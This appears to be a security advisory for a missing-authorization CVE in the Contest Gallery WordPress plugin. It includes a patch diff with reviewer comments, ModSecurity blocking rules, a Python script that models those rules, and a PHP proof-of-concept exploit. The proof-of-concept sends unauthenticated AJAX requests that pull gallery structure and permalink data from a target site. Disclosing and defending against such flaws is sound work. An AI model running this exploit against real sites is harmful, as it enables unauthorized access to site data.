+				$pid, $GalleryID, $pid, $GalleryID
+			));
+			if (!empty($row)) {
+				$row->WpUserId = $WpUserId;
+				cg_create_json_files_when_activating($GalleryID,$row);
+			}
+		}
+
+		wp_send_json_success(array(
+			'entry_id' => $pid,
+			'user_id' => $WpUserId,
+			'user_login' => $user_login,
+			'detached' => empty($WpUserId)
+		));
 	}
 }
 // attach to another user --- END
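
Review bot: `$row->WpUserId = $WpUserId;` after the SELECT is redundant, since the `$wpdb->update()` that writes `WpUserId` has already run before the row is re-read; drop it or add a comment if it guards against something. On the authorization fix itself: `cg_backend_ajax_require_access_json()` grants this operation to every backend role (administrators, editors and authors, per the removed inline check) and `get_user_by('id', $WpUserId)` only verifies the target exists, so an author can reassign an entry to any account, including an administrator's. If that is intended, say so in a comment; if not, restrict the target set, for example with `current_user_can('edit_user', $WpUserId)`. Minor: `cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash)` precedes the `empty($pid) || empty($GalleryID)` check, so a missing gallery id surfaces as a hash error rather than `cg_missing_attach_data`.
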
@@ -1147,11 +1295,11 @@
                     $isTest = true;
                 }

-                if(empty($cg_secret)){// cause without secret an access token will be at least generated, but can not be used for further requests
-                    $accessToken='error' ;
-                }else{
-                    $accessToken = cg_paypal_get_access_token($cg_client,$cg_secret,$isTest);
-                }
+				if(empty($cg_secret)){// cause without secret an access token will be at least generated, but can not be used for further requests
+					$accessToken='error' ;
+				}else{
+					$accessToken = cg_paypal_get_access_token($cg_client,$cg_secret,$isTest);
+				}

                 if($accessToken!='error' && $accessToken!='no-internet'){
                     echo '###cgkeytrue###';
@@ -1266,7 +1414,6 @@

 // AJAX Script für set comment ---- ENDE

-
 // show paypal transaction response

 add_action('wp_ajax_post_cg_show_paypal_api_response', 'post_cg_show_paypal_api_response');
@@ -1313,46 +1460,51 @@
 if(!function_exists('post_cg_set_for_paypal_sell')){
     function post_cg_set_for_paypal_sell() {

-	    // has to be unsanitized because of the url eventually configured by user
-	    $AllUploadsUsedText = contest_gal1ery_htmlentities_and_preg_replace($_POST['cgSellContainer']['AllUploadsUsedText']);
-        $_POST = cg1l_sanitize_post($_POST);
-	    $_POST['cgSellContainer']['AllUploadsUsedText'] = $AllUploadsUsedText;
-
         contest_gal1ery_db_check();
+        cg_backend_ajax_require_access_json();

-        $isBackendCall = true;
-        $isAjaxCall = true;
-
-        $isAjaxCategoriesCall = true;
+        if (empty($_POST['cgSellContainer']) || !is_array($_POST['cgSellContainer'])) {
+            cg_backend_ajax_error_json('Missing sale settings data.', 400, 'cg_missing_sale_data');
+        }

-        global $wp_version;
-        $sanitize_textarea_field = ($wp_version<4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';
+        $cgSellContainer = $_POST['cgSellContainer'];
+        $GalleryID = (isset($cgSellContainer['GalleryID'])) ? absint($cgSellContainer['GalleryID']) : 0;
+        $realId = (isset($cgSellContainer['realId'])) ? absint($cgSellContainer['realId']) : 0;
+        $saleAction = (isset($cgSellContainer['saleAction'])) ? sanitize_text_field($cgSellContainer['saleAction']) : '';
+        $galleryHash = (isset($_POST['cgGalleryHash'])) ? sanitize_text_field($_POST['cgGalleryHash']) : '';

-        if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) {
+        cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);

-            $user = wp_get_current_user();
-
-            if (
-                is_super_admin($user->ID) ||
-                in_array( 'administrator', (array) $user->roles ) ||
-                in_array( 'editor', (array) $user->roles ) ||
-                in_array( 'author', (array) $user->roles )
-            ) {
+        if (empty($realId) || empty($GalleryID) || !in_array($saleAction, array('activate', 'deactivate'), true)) {
+            cg_backend_ajax_error_json('Missing sale settings data.', 400, 'cg_missing_sale_data');
+        }

-                cg_ecommerce_sale_conf();
+        global $wpdb;
+        $tablename = $wpdb->prefix . "contest_gal1ery";
+        $entry = $wpdb->get_row($wpdb->prepare("SELECT id, GalleryID, EcommerceEntry FROM $tablename WHERE id = %d", $realId));

-                die;
+        if (empty($entry)) {
+            cg_backend_ajax_error_json('Sale entry does not exist.', 400, 'cg_sale_entry_missing');
+        }

-            }else{
-                echo "MISSINGRIGHTS - This area can be edited only as administrator, editor or author.";
-                exit();
-            }
+        if (absint($entry->GalleryID) !== $GalleryID) {
+            cg_backend_ajax_error_json('Entry does not belong to the selected gallery.', 400, 'cg_sale_entry_gallery_mismatch');
+        }

-            exit();
+        if ($saleAction === 'deactivate' && empty($entry->EcommerceEntry)) {
+            cg_backend_ajax_error_json('Sale entry is not active.', 400, 'cg_sale_entry_not_active');
         }
-        else {
-            exit();
+
+        // has to be unsanitized because of the url eventually configured by user
+        $AllUploadsUsedText = '';
+        if (isset($_POST['cgSellContainer']['AllUploadsUsedText'])) {
+            $AllUploadsUsedText = contest_gal1ery_htmlentities_and_preg_replace($_POST['cgSellContainer']['AllUploadsUsedText']);
         }
+        $_POST = cg1l_sanitize_post($_POST);
+        $_POST['cgSellContainer']['AllUploadsUsedText'] = $AllUploadsUsedText;
+
+        cg_ecommerce_sale_conf();
+        die;
     }
 }
 // set for paypal sell --- END
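
Review bot: `contest_gal1ery_db_check()` is called before `cg_backend_ajax_require_access_json()` in post_cg_set_for_paypal_sell, the opposite order from post_cg_move_to_another_gallery, so an unauthenticated request still triggers the database check before being rejected; put the access check first. The error id `cg_missing_sale_data` is also reused for two different conditions (the container missing or not an array, and an invalid `realId`/`GalleryID`/`saleAction`), which makes client-side handling and log triage ambiguous; give the second condition its own id. Note that the `cgSellContainer` fields are read before `cg1l_sanitize_post($_POST)` runs; that is fine here because each value goes through `absint()` or `sanitize_text_field()`, but a comment saying so would stop someone later adding an unsanitized read above that line.
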
@@ -1402,51 +1554,6 @@
     }
 }

-// deactivate paypal sale
-add_action( 'wp_ajax_post_cg_deactivate_ecommerce_sale', 'post_cg_deactivate_ecommerce_sale' );
-if(!function_exists('post_cg_deactivate_ecommerce_sale')){
-    function post_cg_deactivate_ecommerce_sale() {
-
-        $_POST = cg1l_sanitize_post($_POST);
-
-        contest_gal1ery_db_check();
-
-        $isBackendCall = true;
-        $isAjaxCall = true;
-
-        $isAjaxCategoriesCall = true;
-
-        global $wp_version;
-        $sanitize_textarea_field = ($wp_version<4.7) ? 'sanitize_text_field' : 'sanitiz
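
Review bot: removing the `add_action( 'wp_ajax_post_cg_deactivate_ecommerce_sale', ... )` registration means any client still posting `action=post_cg_deactivate_ecommerce_sale` is no longer handled; the `saleAction === 'deactivate'` branch added to post_cg_set_for_paypal_sell looks like the replacement, so confirm the backend JS was switched to that action and nothing else referenced the old handler. The hunk is cut off mid-line here, so the remainder of the removal is not visible for review.
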

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rules to protect against this particular CVE. They match on the vulnerable action names, so they also block the same AJAX calls from legitimate backend users until the plugin is updated to the patched version 29.0.0.

ModSecurity
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-42657 unauthorized AJAX action attempted',severity:'CRITICAL',tag:'CVE-2026-42657'"
SecRule ARGS_POST:action "@streq post_cg_move_to_another_gallery_get_inputs" "chain"
SecRule ARGS_POST:cgMoveFromGalleryID "@rx ^\d+$" "t:none"

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2026-42657 unauthorized AJAX action attempted',severity:'CRITICAL',tag:'CVE-2026-42657'"
SecRule ARGS_POST:action "@streq post_cg_get_current_permalinks" "t:none"

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261996,phase:2,deny,status:403,chain,msg:'CVE-2026-42657 unauthorized AJAX action attempted',severity:'CRITICAL',tag:'CVE-2026-42657'"
SecRule ARGS_POST:action "@streq post_cg_move_to_another_gallery" "chain"
SecRule ARGS_POST:cgMoveRealId "@rx ^\d+$" "t:none"

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261997,phase:2,deny,status:403,chain,msg:'CVE-2026-42657 unauthorized AJAX action attempted',severity:'CRITICAL',tag:'CVE-2026-42657'"
SecRule ARGS_POST:action "@streq post_cg_create_pdf_preview_backend" "t:none"
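
To check the logic of these four chains before deploying them, the following Python script (an added example, not part of Atomic Edge's rule set or the plugin's code) models each chain's conditions, that is the exact match on REQUEST_URI, the exact match on the POST `action` parameter and, where present, the `^\d+$` regex on the id parameter, and runs them over a few constructed admin-ajax POST bodies. It parses bodies with `urllib.parse.parse_qs` and does not reproduce ModSecurity phases, transformations or other engine behaviour; the sample requests are constructed for the example, not captured traffic.

```python
"""Offline model of the four ModSecurity chains above, with constructed sample requests."""
import re
from urllib.parse import parse_qs

AJAX_URI = "/wp-admin/admin-ajax.php"

# One tuple per chain: (rule id, required value of ARGS_POST:action,
# optional (parameter name, regex) for the third link of the chain).
RULES = [
    (20261994, "post_cg_move_to_another_gallery_get_inputs", ("cgMoveFromGalleryID", r"^\d+$")),
    (20261995, "post_cg_get_current_permalinks", None),
    (20261996, "post_cg_move_to_another_gallery", ("cgMoveRealId", r"^\d+$")),
    (20261997, "post_cg_create_pdf_preview_backend", None),
]


def evaluate(uri, body):
    """Return the id of the first chain that would deny the request, or None.

    Models REQUEST_URI @streq, ARGS_POST:<name> @streq and ARGS_POST:<name> @rx;
    every value of a repeated parameter is tested, as ModSecurity does.
    Phases, transformations and other engine details are not modelled.
    """
    if uri != AJAX_URI:
        return None
    args = parse_qs(body, keep_blank_values=True)
    for rule_id, action, extra in RULES:
        if action not in args.get("action", []):
            continue  # second link of the chain does not match
        if extra is None:
            return rule_id  # two-link chain: URI + action is enough
        name, pattern = extra
        if any(re.search(pattern, value) for value in args.get(name, [])):
            return rule_id
    return None


# Constructed sample requests (assumed shapes, not captured traffic).
SAMPLE_REQUESTS = [
    ("get_inputs", AJAX_URI,
     "action=post_cg_move_to_another_gallery_get_inputs&cgMoveFromGalleryID=1&cgGalleryHash="),
    ("permalinks", AJAX_URI, "action=post_cg_get_current_permalinks&cg_nonce="),
    ("move", AJAX_URI,
     "action=post_cg_move_to_another_gallery&cgMoveRealId=5&cg_in_gallery_id_to_move=2"),
    ("pdf_preview", AJAX_URI, "action=post_cg_create_pdf_preview_backend"),
    ("benign_heartbeat", AJAX_URI, "action=heartbeat&_nonce=0000"),
    ("other_uri", "/wp-admin/admin-post.php", "action=post_cg_get_current_permalinks"),
]


def run_samples():
    """Map each sample name to the rule id that denies it (None means it passes)."""
    return {name: evaluate(uri, body) for name, uri, body in SAMPLE_REQUESTS}


if __name__ == "__main__":
    for name, rule_id in run_samples().items():
        verdict = f"deny by rule {rule_id}" if rule_id else "pass"
        print(f"{name:18} -> {verdict}")
```

Running it prints which rule id each sample would trip; assertions on `run_samples()` turn the script into a regression test that fails if the rule set is later edited in a way that stops covering one of the four handlers or starts blocking unrelated core AJAX actions such as `heartbeat`.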

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-42657 - Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 28.1.7 - Missing Authorization
// This script exploits missing authorization in post_cg_move_to_another_gallery_get_inputs action

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site

// Endpoint for WordPress AJAX
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// Step 1: Exploit post_cg_move_to_another_gallery_get_inputs (no auth required)
echo "[*] Attempting unauthorized access to post_cg_move_to_another_gallery_get_inputs...\n";

$data = array(
    'action' => 'post_cg_move_to_another_gallery_get_inputs',
    'cgMoveFromGalleryID' => 1,
    'cgGalleryHash' => '', // Gallery hash validation may be bypassed if not properly enforced
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if (curl_errno($ch)) {
    echo "[!] cURL error: " . curl_error($ch) . "\n";
} else {
    echo "[*] HTTP Response Code: $http_code\n";
    echo "[*] Response body (first 500 chars): " . substr($response, 0, 500) . "\n";

    // Check if we got gallery data back (success)
    if (strpos($response, 'galleryIDs') !== false || strpos($response, 'allCategoriesByGalleryID') !== false) {
        echo "[+] SUCCESS: Unauthorized access granted! Retrieved gallery structure data.\n";
    } elseif ($http_code == 403) {
        echo "[-] Access denied (403). The target may be patched or has additional protection.\n";
    } else {
        echo "[*] Response received but unclear if access was granted.\n";
    }
}

curl_close($ch);

// Step 2: Exploit post_cg_get_current_permalinks (only nonce check, no capability check)
echo "\n[*] Attempting unauthorized access to post_cg_get_current_permalinks...\n";

$data2 = array(
    'action' => 'post_cg_get_current_permalinks',
    'cg_nonce' => '', // Empty nonce may still be verified but some versions accept
);

$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, $ajax_url);
curl_setopt($ch2, CURLOPT_POST, true);
curl_setopt($ch2, CURLOPT_POSTFIELDS, http_build_query($data2));
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch2, CURLOPT_HEADER, false);
curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false);

$response2 = curl_exec($ch2);
$http_code2 = curl_getinfo($ch2, CURLINFO_HTTP_CODE);

if (curl_errno($ch2)) {
    echo "[!] cURL error: " . curl_error($ch2) . "\n";
} else {
    echo "[*] HTTP Response Code: $http_code2\n";
    echo "[*] Response body (first 500 chars): " . substr($response2, 0, 500) . "\n";

    if (strpos($response2, 'permalink') !== false || $http_code2 == 200) {
        echo "[+] SUCCESS: Unauthorized access granted! Retrieved permalink data.\n";
    } elseif ($http_code2 == 403) {
        echo "[-] Access denied (403). The target may be patched or has additional protection.\n";
    }
}

curl_close($ch2);
?>
